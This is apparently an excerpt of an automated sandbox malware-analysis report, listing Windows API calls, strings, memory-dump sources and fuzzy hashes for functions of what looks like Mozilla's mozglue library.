                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50E000
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C4D4A68), ref: 6C50DE7B
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                              • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C4D4A68), ref: 6C50DEB8
                                              • free.MOZGLUE(00000000,?,6C4D4A68), ref: 6C50DEFE
                                              • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C50DF38
                                              Strings
                                              • [I %d/%d] locked_profiler_stop, xrefs: 6C50DE83
                                              • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C50E00E
                                              • <none>, xrefs: 6C50DFD7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                              • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                              • API String ID: 1281939033-809102171
                                              • Opcode ID: 71c636cd4304358367fc3c9cf8e3e02dc3e4bbf0ea8cd4d34c6328584ede9a6c
                                              • Instruction ID: b052968f374a846e66537f4ede8bf04e1c3cff5d56466a9a7609d32b12379e88
                                              • Opcode Fuzzy Hash: 71c636cd4304358367fc3c9cf8e3e02dc3e4bbf0ea8cd4d34c6328584ede9a6c
                                              • Instruction Fuzzy Hash: A6411331B01610DBDB10AF68DC08BAEB775FB8631CF058219E909C7B01DB31A805CBEA
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D85F
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D86C
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D918
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D93C
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D948
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D970
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D976
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D982
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D9CF
                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C51DA2E
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51DA6F
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51DA78
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C51DA91
                                                • Part of subcall function 6C4E5C50: GetTickCount64.KERNEL32 ref: 6C4E5D40
                                                • Part of subcall function 6C4E5C50: EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4E5D67
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51DAB7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                              • String ID:
                                              • API String ID: 1195625958-0
                                              • Opcode ID: f1b5055f9de0efd813c8d3d7a47eb8c3ef0b5110da3da53bcc472de1aa9c78ff
                                              • Instruction ID: c62203c64a6b4b8a987d8dc2a2dd64e9e12f978962300bc45d0e0c675e6d8f10
                                              • Opcode Fuzzy Hash: f1b5055f9de0efd813c8d3d7a47eb8c3ef0b5110da3da53bcc472de1aa9c78ff
                                              • Instruction Fuzzy Hash: 33719E756043049FCB00EF29C888B5EBBF5FF89318F15856DE85A9B741EB30A944CB95
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D4F0
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D4FC
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D52A
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D530
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D53F
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D55F
                                              • free.MOZGLUE(00000000), ref: 6C51D585
                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C51D5D3
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D5F9
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D605
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D652
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51D658
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C51D667
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C51D6A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                              • String ID:
                                              • API String ID: 2206442479-0
                                              • Opcode ID: 353ec00d293833358704f286ddc2b3ba623266615b6b725f907f9cbe260382c4
                                              • Instruction ID: 8b7ac84b270c9605598df6f28e4f5ef264a7003cc0bd98d9f85f25aec7b92694
                                              • Opcode Fuzzy Hash: 353ec00d293833358704f286ddc2b3ba623266615b6b725f907f9cbe260382c4
                                              • Instruction Fuzzy Hash: 32518271604B05DFC704EF35C888A9ABBF4FF89318F01862DE85A87B11DB30A855CB95
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4C1EC1
                                              • LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4C1EE1
                                              • EnterCriticalSection.KERNEL32(6C54E744), ref: 6C4C1F38
                                              • LeaveCriticalSection.KERNEL32(6C54E744), ref: 6C4C1F5C
                                              • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C4C1F83
                                              • LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4C1FC0
                                              • EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4C1FE2
                                              • LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4C1FF6
                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4C2019
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                              • String ID: DTl$DTl$MOZ_CRASH()$\Tl
                                              • API String ID: 2055633661-4231833847
                                              • Opcode ID: 6aa49c918242ecc2f00e47bda332479da20268dd4ba1d4cbb66ee628ab8e3530
                                              • Instruction ID: 87bbbb0fff8cebf90fc26ada8900070b427fd0b2edac8aeef5955aa48a1e20fb
                                              • Opcode Fuzzy Hash: 6aa49c918242ecc2f00e47bda332479da20268dd4ba1d4cbb66ee628ab8e3530
                                              • Instruction Fuzzy Hash: 3A41D679B043558BDF00EF78CC88F6E7AB5EB8A35DF018129E91497745DBB098048BD6
                                              APIs
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C4E56D1
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4E56E9
                                              • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C4E56F1
                                              • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C4E5744
                                              • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C4E57BC
                                              • GetTickCount64.KERNEL32 ref: 6C4E58CB
                                              • EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4E58F3
                                              • __aulldiv.LIBCMT ref: 6C4E5945
                                              • LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4E59B2
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C54F638,?,?,?,?), ref: 6C4E59E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                              • String ID: MOZ_APP_RESTART
                                              • API String ID: 2752551254-2657566371
                                              • Opcode ID: f1f835d13125ebe6410e5940ccfdf07eddcd39ce7f2113a1703117c2cbdbd564
                                              • Instruction ID: fd71d954092c4137ad2baa1297ddd43424779959c10a970528252b34e13325be
                                              • Opcode Fuzzy Hash: f1f835d13125ebe6410e5940ccfdf07eddcd39ce7f2113a1703117c2cbdbd564
                                              • Instruction Fuzzy Hash: E9C17C31A097509FD705DF28C840A6AB7F1BFCA719F168B1DE8C897761D730A885CB86
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50EC84
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50EC8C
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50ECA1
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50ECAE
                                              • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C50ECC5
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50ED0A
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C50ED19
                                              • CloseHandle.KERNEL32(?), ref: 6C50ED28
                                              • free.MOZGLUE(00000000), ref: 6C50ED2F
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50ED59
                                              Strings
                                              • [I %d/%d] profiler_ensure_started, xrefs: 6C50EC94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                              • String ID: [I %d/%d] profiler_ensure_started
                                              • API String ID: 4057186437-125001283
                                              • Opcode ID: 22df80c8088def91dda0c4b711511b4337eb9f5743fbc691f6351d82bc5ad4e0
                                              • Instruction ID: 7a59ea485423be68a8ba0fa51f7e84e5a82c1dde5dba4a23d7675b6868d9c7f4
                                              • Opcode Fuzzy Hash: 22df80c8088def91dda0c4b711511b4337eb9f5743fbc691f6351d82bc5ad4e0
                                              • Instruction Fuzzy Hash: 9121BF76700504ABDB00BF28DC08EAA7779FB8636DF218214F81897741DBB29815CBA5
                                              APIs
                                                • Part of subcall function 6C4CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4CEB83
                                              • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C50B392,?,?,00000001), ref: 6C5091F4
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                              • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                              • API String ID: 3790164461-3347204862
                                              • Opcode ID: 9a62720c290a659d4055742a89ab1849f7106bad103c8ef80a7b474d4d949c8b
                                              • Instruction ID: f31e91ad254427e454a2ad42e3aac81ccd331f067b88db46c410404c4ef662eb
                                              • Opcode Fuzzy Hash: 9a62720c290a659d4055742a89ab1849f7106bad103c8ef80a7b474d4d949c8b
                                              • Instruction Fuzzy Hash: EAB1B1B0B012199BDB04CF94CC96FAEBBB5AF84318F10452DD405ABF84E731A945CBE1
                                              APIs
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4EC5A3
                                              • WideCharToMultiByte.KERNEL32 ref: 6C4EC9EA
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C4EC9FB
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C4ECA12
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4ECA2E
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4ECAA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidestrlen$freemalloc
                                              • String ID: (null)$0
                                              • API String ID: 4074790623-38302674
                                              • Opcode ID: 2ab7116b2d99c122afa762eaf43f78d701739f9593130934c8c164f005c93980
                                              • Instruction ID: aba935ff551dd2f0c20ac0281bcd3efa902dbf00095dfa299f0f9303d7ee0d0b
                                              • Opcode Fuzzy Hash: 2ab7116b2d99c122afa762eaf43f78d701739f9593130934c8c164f005c93980
                                              • Instruction Fuzzy Hash: 5EA178306093429FDB00EF28C954F5BBBE1AFC974AF06892DE89997751D731E805CB82
                                              APIs
                                              • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4EC784
                                              • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4EC801
                                              • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C4EC83D
                                              • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C4EC891
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                              • String ID: INF$NAN$inf$nan
                                              • API String ID: 1991403756-4166689840
                                              • Opcode ID: d416bb9fb02c6ff9582249a1779ed0dae944cef5c76f0aeb3828aeac2d544b18
                                              • Instruction ID: 443b12e1e652eb6dc7b43ea9864561e32a94af9be965578a9d15d344a9a45215
                                              • Opcode Fuzzy Hash: d416bb9fb02c6ff9582249a1779ed0dae944cef5c76f0aeb3828aeac2d544b18
                                              • Instruction Fuzzy Hash: C05161706087408BD704EF68C581E9AFBF0BF9E30AF018A2DE9D597651E770D9898B42
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4C3492
                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4C34A9
                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4C34EF
                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C4C350E
                                              • __Init_thread_footer.LIBCMT ref: 6C4C3522
                                              • __aulldiv.LIBCMT ref: 6C4C3552
                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4C357C
                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4C3592
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                              • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                              • API String ID: 3634367004-706389432
                                              • Opcode ID: c52f9097373819068a43d8ab0e243476646f947bb3ff6ae0bb70e1a0bf0caf0d
                                              • Instruction ID: 9b64de896ff658fb87b5f5816648a8d08028d0dfc9b7f4e527a1c67fc94c800c
                                              • Opcode Fuzzy Hash: c52f9097373819068a43d8ab0e243476646f947bb3ff6ae0bb70e1a0bf0caf0d
                                              • Instruction Fuzzy Hash: 9631C175B002459BDF00EFB9CC48EAE77B5FB8631DF128119E505A3760EB70A905CB65
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$moz_xmalloc
                                              • String ID:
                                              • API String ID: 3009372454-0
                                              • Opcode ID: ea5285e49e6add9ee221d28a93bf8734b9595a789a29dfaa1a122b6159187e63
                                              • Instruction ID: 03ebdaa3d7f3ca997d54c2a5adbe619d0a84967af7e77a284569a1b0e1242552
                                              • Opcode Fuzzy Hash: ea5285e49e6add9ee221d28a93bf8734b9595a789a29dfaa1a122b6159187e63
                                              • Instruction Fuzzy Hash: D3B1E279B011108FDB18DF2CCAD0F7D76A1AF453A8F18166CE816DBBE6D73499408B92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                              • String ID:
                                              • API String ID: 1192971331-0
                                              • Opcode ID: 937a2ef3d58f120e9b9cb391161ed597cde5e0127f37f71466e5c8b2aca2aedd
                                              • Instruction ID: 2154db3fd9ad9efa85e2391a8b75602012df0b146c216303c64f679c9bbb094b
                                              • Opcode Fuzzy Hash: 937a2ef3d58f120e9b9cb391161ed597cde5e0127f37f71466e5c8b2aca2aedd
                                              • Instruction Fuzzy Hash: 5D315FB19047048FDB00FF7CDA4866EBBF0BF85309F02892DE99997251EB749458CB86
                                              APIs
                                              • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C4D9675
                                              • __Init_thread_footer.LIBCMT ref: 6C4D9697
                                              • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C4D96E8
                                              • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C4D9707
                                              • __Init_thread_footer.LIBCMT ref: 6C4D971F
                                              • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4D9773
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C4D97B7
                                              • FreeLibrary.KERNEL32 ref: 6C4D97D0
                                              • FreeLibrary.KERNEL32 ref: 6C4D97EB
                                              • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4D9824
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                              • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                              • API String ID: 409848716-3880535382
